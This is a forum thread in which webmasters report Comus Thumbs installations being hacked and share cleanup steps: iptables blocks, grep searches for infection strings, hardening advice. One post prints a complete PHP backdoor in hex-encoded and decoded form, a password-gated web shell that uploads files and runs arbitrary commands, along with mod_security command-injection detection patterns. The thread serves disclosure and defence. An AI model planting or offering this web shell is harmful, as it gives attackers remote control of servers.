Secure/Delete your Comus Installation, ALL HTML/PHP Files on Server infected

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • hjnet
    Confirmed User
    • May 2002
    • 3815

    #1

    Secure/Delete your Comus Installation, ALL HTML/PHP Files on Server infected

    Just as a warning for everyone, I had two old copies of comus on a Server with ~20 other Domains. Looks like some hacker managed to break in through comus to load up a script that simply added some malicious Java Script code to EVERY HTML and PHP file on my Server that have been set to 777 file permissions. So some of my Smart Thumbs copies have been affected, and even some of my old static HTML galleries.

    As far as I know there isn't an security update from Comus available by now, so I simply had to delete my two old copies from the Server as it was too risky to keep them there. So if you have Comus on your Box watch it very closely or get rid of the installations.
  • beta-tester
    Rock 'n Roll Baby!
    • Sep 2004
    • 22562

    #2
    How come that I didn't get any of this shit? Maybe my server security is too good?

    Sig for sale. Affordable prices. Contact me and get a great deal ;)

    My contact:
    ICQ: 944-320-46
    e-mail: manca {AT} HotFreeSex4All.com

    Comment

    • hjnet
      Confirmed User
      • May 2002
      • 3815

      #3
      Originally posted by beta-tester
      How come that I didn't get any of this shit? Maybe my server security is too good?
      Yeah, I was thinking the same until yesterday

      Comment

      • asianseekerz
        Confirmed User
        • Aug 2008
        • 1609

        #4
        sometimes its always on the server side securities if you get hacked!!!
        LUSTY LIFES : Dad & Daughter Wild Adventures : Naughty Wild Sister
        Contact : ICQ : 372109
        Email add: [email protected]

        Comment

        • k0nr4d
          Confirmed User
          • Aug 2006
          • 9231

          #5
          Run a virus scan. Usually this stuff isn't caused by someone hacking your server or exploiting your script, but rather by a virus on your computer that logs in and puts this shit in.
          Mechanical Bunny Media
          Mechbunny Tube Script | Mechbunny Webcam Aggregator Script | Custom Web Development

          Comment

          • qxm
            Confirmed User
            • Jul 2006
            • 5970

            #6
            Just checked one of my old tgps (the only one that still had comus installed)......... yeap.... had to put a 302 htaccess redirect to one of my other sites... every thumb redirect was causing my antivirus to go on full alert...

            ICQ: 266990876

            Comment

            • TheDA
              Confirmed User
              • May 2006
              • 4665

              #7
              There's been a few people hit wit this in the past few days
              Sharleen Spiteri - 1989 - In The Ass

              Comment

              • hjnet
                Confirmed User
                • May 2002
                • 3815

                #8
                Originally posted by k0nr4d
                Run a virus scan. Usually this stuff isn't caused by someone hacking your server or exploiting your script, but rather by a virus on your computer that logs in and puts this shit in.
                It's definitely a Comus hack, in my case it was a php script that got executed every ~10 minutes through an external request from an IP in China. I've blocked the IP from my server and it was gone. Many other webmasters are affected too ATM, so this thread should basically a warning for others to have a close eye on their sites

                Comment

                • hjnet
                  Confirmed User
                  • May 2002
                  • 3815

                  #9
                  Originally posted by qxm
                  Just checked one of my old tgps (the only one that still had comus installed)......... yeap.... had to put a 302 htaccess redirect to one of my other sites... every thumb redirect was causing my antivirus to go on full alert...
                  Yes but check your other HTML and PHP files too on that Server, even if they're on other domains. Take a look at the Java Script code that got inserted in your hacked pages, and search your entire Server for files that might contain that piece of string too

                  i.e. grep -R "function Sym1" * > list_of_infected_files

                  Oh, and at first you might wanna try blocking the IP that calls for the script that put's that malicious Java Script code into your files

                  iptables -A INPUT -s 122.70.145.151 -j DROP

                  Comment

                  • Davy
                    Confirmed User
                    • Apr 2006
                    • 4323

                    #10
                    Originally posted by hjnet
                    Yeah, I was thinking the same until yesterday
                    You guys probably never followed the advice to chmod everything to 777.
                    ---
                    ICQ 14-76-98 <-- I don't use this at all

                    Comment

                    • cykoe6
                      Confirmed User
                      • Apr 2005
                      • 4499

                      #11
                      Fuccckkkkkkkkk this hack got me too. I am deleting my old Comus install now but from what I understand even after you have deleted Comus there are a bunch more backdoors that have likely been installed on the server and have to be rooted out.
                      бабки, шлюхи, сила

                      Comment

                      • Agent 488
                        Registered User
                        • Feb 2006
                        • 22511

                        #12
                        guess that is the final nail in the coffin for comus.

                        wish the best. hacks suck.

                        Comment

                        • SuzzyQ
                          Confirmed User
                          • Dec 2006
                          • 1557

                          #13
                          I am wondering if I delete all the comus installs, have my host load an old backup in and set the files to read only files, will that take care of things?

                          Anybody?

                          Comment

                          • HEAT
                            Confirmed User
                            • Sep 2003
                            • 2255

                            #14
                            How to fix Comus hack.

                            1. Install mod_security. (will stop code injection and defend from web attack.)


                            2. Migrate Comus Thumbs to Smart Thumbs - export and import gals, set cron/templates/trades/secure.php/etc..


                            3. Remove CT completely.


                            4. Find bad phpshell scripts(backdoor) that hacker installed into your server and remove them.

                            grep -R 696620287374 * > /home/backdoor.txt &
                            (will find backdoor scripts under /home and save list to /home/backdoor.txt - normally they named with 'backup.php, sync.php')


                            5. Find infected website files and edit/delete.


                            grep -R svrtsg:#9@#yliwvi:#mlmv@# * > /home/infected.txt &
                            (will find all js code injected files under /home and save list to /home/infected.txt)


                            6. Repeat #4~#5.


                            7. Setup better security.
                            change all server passwords(linux users/mysql users/web logins).
                            install Rootkit Hunter.
                            update APPs via yum(centOS).
                            apache in suexec mode, use suphp, no 777 permission.
                            use SFTP.
                            update mod_security rules.
                            install reliable anti-spyware to your local machine.
                            Last edited by HEAT; 09-21-2009, 06:39 AM.
                            254-282-542

                            Comment

                            • hjnet
                              Confirmed User
                              • May 2002
                              • 3815

                              #15
                              Originally posted by HEAT
                              grep -R 696620287374 * > /home/backdoor.txt &
                              Did you check that the "696620287374" is the same in all backdoor files? Cause I think a "smart" hacker would use randomized files to ensure they're harder to detect


                              Originally posted by HEAT
                              5. Find infected website files and edit/delete.

                              grep -R svrtsg:#9@#yliwvi:#mlmv@# * > /home/infected.txt &
                              For example I had to search for another piece of string to find my infected files, looks like the guy doesn't use the same code strings for his infections all the time





                              P.S. I'd REALLY like to break some kneecaps today

                              Comment

                              • hjnet
                                Confirmed User
                                • May 2002
                                • 3815

                                #16
                                Bump Bump

                                Comment

                                • HEAT
                                  Confirmed User
                                  • Sep 2003
                                  • 2255

                                  #17
                                  Originally posted by hjnet
                                  Did you check that the "696620287374" is the same in all backdoor files? Cause I think a "smart" hacker would use randomized files to ensure they're harder to detect
                                  Yes, all backdoors had the same strings starting with 6966202873 in my case.
                                  Here is the full php code:
                                  echo " ";
                                  $s = "696620287374726C656E28245F504F53545B6363635D293D3 D30297B69662028245F504F53545B706173735D213D2731323 327297B6563686F20273C68746D6C3E3C626F6479206267636 F6C6F723D23424246464242206F6E6C6F61643D22646F63756 D656E742E6D79662E706173732E666F63757328293B223E3C6 66F726D206D6574686F643D504F53543E3C696E707574206E6 16D653D706173733E3C2F666F726D3E3C2F626F64793E3C2F6 8746D6C3E273B6578697428293B7D6563686F20273C68746D6 C3E3C626F6479206267636F6C6F723D23424246464242206F6 E6C6F61643D22646F63756D656E742E6D79662E63632E666F6 3757328293B223E273B6563686F20273C666F726D206E616D6 53D6D7966206D6574686F643D504F535420656E63747970653 D226D756C7469706172742F666F726D2D64617461223E3C696 E70757420747970653D68696464656E206E616D653D7061737 32076616C75653D272E245F504F53545B706173735D2E273E3 C696E70757420747970653D66696C65206E616D653D7570666 96C653E3C696E707574206E616D653D6E65776E616D653E3C6 96E70757420747970653D7375626D69743E3C62723E273B656 3686F20273C696E707574206E616D653D63632073697A653D3 7332076616C75653D22272E7374726970736C6173686573282 45F504F53545B63635D292E27223E3C2F666F726D3E273B656 3686F20273C7072653E273B20696620286D6F76655F75706C6 F616465645F66696C6528245F46494C45535B27757066696C6 5275D5B27746D705F6E616D65275D2C20245F504F53545B6E6 5776E616D655D2929207B202F2A6563686F202253656E742E3 C62723E5C6E223B2A2F207D69662028245F504F53545B6D666 96C655D29207B2020202466703D666F70656E28245F504F535 45B6E65776E616D655D2C277727293B202020666F7228246B3 D303B20246B3C7374726C656E28245F504F53545B6D66696C6 55D293B20246B2B3D322920207B20202020246363203D20737 56273747228245F504F53545B6D66696C655D2C246B2C32293 B20202020246363203D20273078272E2463633B20202020202 02020246363203D20726F756E6428246363293B20202020246 363203D2063687228246363293B20202020667772697465282 466702C246363293B2020207D202066636C6F7365282466702 93B207D24636F3D7374726970736C617368657328245F504F5 3545B63635D293B20246F7574203D2027273B69662866756E6 374696F6E5F6578697374732827657865632729297B6578656 32824636F2C246F7574293B246F7574203D206A6F696E28225 C6E222C246F7574293B7D656C736569662866756E6374696F6 E5F657869737473282770617373746872752729297B6F625F7 37461727428293B70617373746872752824636F293B246F757 4203D206F625F6765745F636F6E74656E747328293B6F625F6 56E645F636C65616E28293B7D656C736569662866756E63746 96F6E5F657869737473282773797374656D2729297B6F625F7 37461727428293B73797374656D2824636F293B246F7574203 D206F625F6765745F636F6E74656E747328293B6F625F656E6 45F636C65616E28293B7D656C736569662866756E6374696F6 E5F65786973747328277368656C6C5F657865632729297B246 F7574203D207368656C6C5F657865632824636F293B7D656C7 36569662869735F7265736F75726365282466203D20706F706 56E2824636F2C2272222929297B246F7574203D2022223B776 8696C6528214066656F662824662929207B20246F7574202E3 D2066726561642824662C31303234293B7D70636C6F7365282 466293B7D656C7365207B246F75743D276578206661696C656 4273B7D6563686F20246F75743B6563686F20273C2F7072653 E273B6563686F20273C2F626F64793E3C2F68746D6C3E273B7 D20656C7365207B6966286765745F6D616769635F71756F746 5735F6770632829297B6576616C287374726970736C6173686 57328245F504F53545B6363635D29293B7D20656C7365207B6 576616C28245F504F53545B6363635D293B7D7D";
                                  $sss = "";
                                  $k = 0;
                                  for ( ; $k < strlen( $s ); $k += 2 )
                                  {
                                  $ss = chr( "0x".substr( $s, $k, 2 ) + 0 );
                                  $sss .= $ss;
                                  }
                                  eval( $sss );
                                  $ssss = "************************************************* ************************************************** *********************************";
                                  echo "\r\n";
                                  ?>
                                  Code decripted :
                                  if (strlen($_POST[ccc])==0){if ($_POST[pass]!='123'){echo '<html><body bgcolor=#BBFFBB onload="document.myf.pass.focus();"><form method=POST><input name=pass></form></body></html>';exit();}echo '<html><body bgcolor=#BBFFBB onload="document.myf.cc.focus();">';echo '<form name=myf method=POST enctype="multipart/form-data"><input type=hidden name=pass value='.$_POST[pass].'><input type=file name=upfile><input name=newname><input type=submit><br>';echo '<input name=cc size=73 value="'.stripslashes($_POST[cc]).'"></form>';echo '<pre>'; if (move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST[newname])) { /*echo "Sent.<br>\n";*/ }if ($_POST[mfile]) { $fp=fopen($_POST[newname],'w'); for($k=0; $k<strlen($_POST[mfile]); $k+=2) { $cc = substr($_POST[mfile],$k,2); $cc = '0x'.$cc; $cc = round($cc); $cc = chr($cc); fwrite($fp,$cc); } fclose($fp); }$co=stripslashes($_POST[cc]); $out = '';if(function_exists('exec')){exec($co,$out);$out = join("\n",$out);}elseif(function_exists('passthru' )){ob_start();passthru($co);$out = ob_get_contents();ob_end_clean();}elseif(function_ exists('system')){ob_start();system($co);$out = ob_get_contents();ob_end_clean();}elseif(function_ exists('shell_exec')){$out = shell_exec($co);}elseif(is_resource($f = popen($co,"r"))){$out = "";while(!@feof($f)) { $out .= fread($f,1024);}pclose($f);}else {$out='ex failed';}echo $out;echo '</pre>';echo '</body></html>';} else {if(get_magic_quotes_gpc()){eval(stripslashes($_PO ST[ccc]));} else {eval($_POST[ccc]);}}
                                  I found out it's just another ordinary blind SQL injection attack that has this pattern:

                                  \\b(??:s(?:ys(???:process|tabl)e|filegroup| object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubst r(?:ing)?)|user_(???:constrain|objec)t|tab(?:_ column|le)|ind_column|user)s|password|group)|a(?:t t(?:rel|typ)id|ll_objects)|object_(??:nam|typ)e| id)| ..." at ARGS:ccc.
                                  I don't think this string can't be randomized since it is phpshell and uses 'shell_exec' function.
                                  or if you had installed mod_security, look into /var/log/httpd/modsec_debug.log.

                                  whatever code they have on file, mod_security blocks system calls via web.
                                  you will find a bunch of these logs :
                                  [Sun Sep 20 11:00:33 2009] [error] [client 122.70.145.151] ModSecurity: Access denied with code 501 (phase 2). Pattern match "(?:\\b(??:n(?:et(?:\\b\\W+?\\blocalgroup|\\.e xe )|(?:map|c)\\.exe)|t(?:racer(?:oute|t)|elnet\\.exe |clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo \\b\\W*?\\by+)\\b|c(?:md(??:32)?\\.exe\\b|\\b\\W *?\\/c)|d(?:\\b\\W*?[\\\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\+.{0,3}x))|[\\;\\|\\`]\\W*? ..." at ARGS:ccc. [file "/etc/httpd/modsecurity.d/modsecurity_crs_40_generic_attacks.conf"] [line "133"] [id "950006"] [msg "System Command Injection"] [data ";\\x0a echo"] [severity "CRITICAL"] [tag "WEB_ATTACK/COMMAND_INJECTION"] [hostname "domain.com"] [uri "/vid/86/vgoJ6xWBzS/vgoJ6xWBzS.php"] [unique_id "oF4EtExMEtMAABs4u8sAAAA2"]
                                  so analyze the log file and catch all php files sending system commands. then you can compare all strings.


                                  And for infected web files, yes looks like the backdoors didn't inject the same js code. each code has different encrypted malware url. So classify all html/php files that have 777 permision then abstract those different codes and make your own grep strings for full search.
                                  Luckly, I had only one common string.
                                  Last edited by HEAT; 09-21-2009, 10:28 AM.
                                  254-282-542

                                  Comment

                                  • hjnet
                                    Confirmed User
                                    • May 2002
                                    • 3815

                                    #18
                                    Originally posted by HEAT
                                    Yes, all backdoors had the same strings starting with 6966202873 in my case.
                                    Thanks, I've already found a few backdoor files in the thumbs folder of one of my ST installations. The string to search for is indeed "6966202873" on my backdoor files too

                                    So people search your servers:

                                    grep -R "6966202873" * > list_of_backdoor_files


                                    Oh, and the backdoor files are called "sync.php, thumbs.php and backup.php" in my case, user:group -> nobody:nobody
                                    Last edited by hjnet; 09-22-2009, 09:00 AM.

                                    Comment

                                    • pussyluver
                                      Clueless OleMan
                                      • Mar 2003
                                      • 11009

                                      #19
                                      Anyone hear from Sixzeros or CT on what's up??

                                      Comment

                                      • nico-t
                                        emperor of my world
                                        • Aug 2004
                                        • 29903

                                        #20
                                        how do i prevent this? ive got ct on a test site so it doesnt matter how, its not yet hacked. What files do i have to change from 777 to something else when i want to prevent it?

                                        Comment

                                        • hjnet
                                          Confirmed User
                                          • May 2002
                                          • 3815

                                          #21
                                          Originally posted by nico-t
                                          how do i prevent this? ive got ct on a test site so it doesnt matter how, its not yet hacked. What files do i have to change from 777 to something else when i want to prevent it?
                                          I don't know HOW exactly they came in through ComusThumbs, but once in the backdoor file starts to create multiple backdoors in other folders of your Server, no matter which domain, and starts infecting writable files (777 and i.e. 666) with some malicious java script.

                                          So if you REALLY intend to keep your copy of CT you should at least ensure that NO files on your server are writable by the user "nobody", and maybe block the IP I've mentioned earlier in this thread from accessing your Server.

                                          Oh, and search for the strings given in this thread with grep, maybe you're already infected and just didn't recognize it by now....

                                          Comment

                                          • hjnet
                                            Confirmed User
                                            • May 2002
                                            • 3815

                                            #22
                                            Just as a short summary how I got rid of this infection sofar

                                            -At first block 122.70.145.151 from accessing your Server, it's an IP in China that triggers the backdoor files on YOUR Server every ~ 10 Minutes to infect writable files

                                            iptables -A INPUT -s 122.70.145.151 -j DROP

                                            And Spudstr from YellowFiber also suggestes to block 122.64.0.0/11

                                            iptables -A INPUT -s 122.64.0.0/11 -j DROP


                                            - Then get rid of your Comus installations, I've simply deleted the entire /ct/ folder as I didn't use my installations anyway. That was the only solution for me as long as there's no security patch available


                                            - Next I've scanned my Server for for any INFECTED Files

                                            grep -R "function Sym1" * > list_of_infected_files
                                            grep -R "function STy6" * > another_list_of_infected_files

                                            These are the only two different types of insertions I've found sofar on my Server, might be possibble that there are more out there, please let us know if you come across new ones so everybody could search their Server for the matching string snippets.


                                            - And finally get rid of the backdoor files:

                                            grep -R "6966202873" * > list_of_backdoor_files

                                            The backdoor files on my Server where called something like backup.php, sync.php, thumbs.php


                                            I hope that's it sofar, now it's time to tighten Server Security a bit more
                                            Last edited by hjnet; 09-25-2009, 02:22 AM.

                                            Comment

                                            • Wiredoctor
                                              Confirmed User
                                              • Dec 2001
                                              • 1632

                                              #23
                                              Originally posted by pussyluver
                                              Anyone hear from Sixzeros or CT on what's up??
                                              Are they even still around ??? Do they even care? Do they have a patched Fix available?
                                              Search For Everything In One Easy Portal
                                              Big Juicy Nipples.com

                                              Comment

                                              • nico-t
                                                emperor of my world
                                                • Aug 2004
                                                • 29903

                                                #24
                                                im no server expert so i just deleted it all.

                                                Comment

                                                • hjnet
                                                  Confirmed User
                                                  • May 2002
                                                  • 3815

                                                  #25
                                                  Bump Bump

                                                  Comment

                                                  • Naughty-Pages
                                                    Confirmed User
                                                    • Oct 2006
                                                    • 4533

                                                    #26
                                                    add me to the list ...

                                                    fuck.. had noticed a few sites of mine with trojans on it a little over a week ago but was on the road and couldn't do much about it.. (the list is now up to 14 sites that have had code added to them)..

                                                    narrowed it down to assuming it was the one site that i use Comus on as being the soruce of the problems and then searched GFY for Comus to confirm others were having an issue... and here we are...

                                                    looks like i'll be killing it as Comus has no update, and going to their site to redownload a frsh copy to make sure i had the latest version just gives an error...

                                                    on this one server i probably have 200-300 sites.. i'm sure that there's more than 14 infected.. looks like i am going to have dun today..

                                                    Comment

                                                    • wizzart
                                                      scriptmaster
                                                      • May 2006
                                                      • 5246

                                                      #27
                                                      good info thatnks
                                                      BimboZone

                                                      Comment

                                                      • Carmine Raguso
                                                        So Fucking Banned
                                                        • Dec 2008
                                                        • 2158

                                                        #28
                                                        Originally posted by wizzart
                                                        good info thatnks
                                                        This is old news man. Get with the program. Stop bumping old shit.

                                                        Comment

                                                        • Fletch XXX
                                                          GFY HALL OF FAME DAMMIT!!!
                                                          • Jan 2002
                                                          • 60840

                                                          #29
                                                          Originally posted by nico-t
                                                          im no server expert so i just deleted it all.
                                                          same. had it sitting on a site, and just hit delete on the CT dir.

                                                          lol

                                                          Want an Android App for your tube, membership, or free site?

                                                          Need banners or promo material? Hit us up (ICQ Fletch: 148841377) or email me fletchxxx at gmail.com - recent work - About me

                                                          Comment

                                                          • Naughty-Pages
                                                            Confirmed User
                                                            • Oct 2006
                                                            • 4533

                                                            #30
                                                            Originally posted by Carmine Raguso
                                                            This is old news man. Get with the program. Stop bumping old shit.
                                                            Umm.. actually smart ass, this is a different/new issue.. and this thread is not old.. this is a current problem...

                                                            Looking through your post history, it's apparent you are a troll.. and your posts have nothing of value whatsoever.. Looking through the past couple weeks of your posts I can only assume you are not even a webmaster.. just really dumb shit..


                                                            more info is here:
                                                            http://www.gofuckyourself.com/showthread.php?t=931492


                                                            please ignore the troll with the avatar of his boyfriend..
                                                            Last edited by Naughty-Pages; 10-04-2009, 04:09 PM.

                                                            Comment

                                                            • pornpf69
                                                              Too lazy to set a custom title
                                                              • Jun 2004
                                                              • 15782

                                                              #31
                                                              I had the same issue... and got about 20 or 30 sites hacked because of CT... I have removed all CT's I had... and redirected those domains to some CAM sites...

                                                              Comment

                                                              • Naughty-Pages
                                                                Confirmed User
                                                                • Oct 2006
                                                                • 4533

                                                                #32
                                                                Originally posted by Carmine Raguso
                                                                This is old news man. Get with the program. Stop bumping old shit.


                                                                We interrupt this thread for a public GFY announcement:
                                                                Carmine Raguso is the OFFICIAL WINNER of the GFY Troll of the Week award!!!
                                                                yup.. he won..

                                                                Last edited by Naughty-Pages; 10-04-2009, 07:05 PM.

                                                                Comment

                                                                • Dennis69
                                                                  Confirmed User
                                                                  • Feb 2003
                                                                  • 1685

                                                                  #33
                                                                  Originally posted by hjnet
                                                                  Just as a short summary how I got rid of this infection sofar

                                                                  -At first block 122.70.145.151 from accessing your Server, it's an IP in China that triggers the backdoor files on YOUR Server every ~ 10 Minutes to infect writable files

                                                                  iptables -A INPUT -s 122.70.145.151 -j DROP

                                                                  And Spudstr from YellowFiber also suggestes to block 122.64.0.0/11

                                                                  iptables -A INPUT -s 122.64.0.0/11 -j DROP


                                                                  - Then get rid of your Comus installations, I've simply deleted the entire /ct/ folder as I didn't use my installations anyway. That was the only solution for me as long as there's no security patch available


                                                                  - Next I've scanned my Server for for any INFECTED Files

                                                                  grep -R "function Sym1" * > list_of_infected_files
                                                                  grep -R "function STy6" * > another_list_of_infected_files

                                                                  These are the only two different types of insertions I've found sofar on my Server, might be possibble that there are more out there, please let us know if you come across new ones so everybody could search their Server for the matching string snippets.


                                                                  - And finally get rid of the backdoor files:

                                                                  grep -R "6966202873" * > list_of_backdoor_files

                                                                  The backdoor files on my Server where called something like backup.php, sync.php, thumbs.php


                                                                  I hope that's it sofar, now it's time to tighten Server Security a bit more

                                                                  Is this all done through SSH?
                                                                  HaHaHa

                                                                  Comment

                                                                  Working...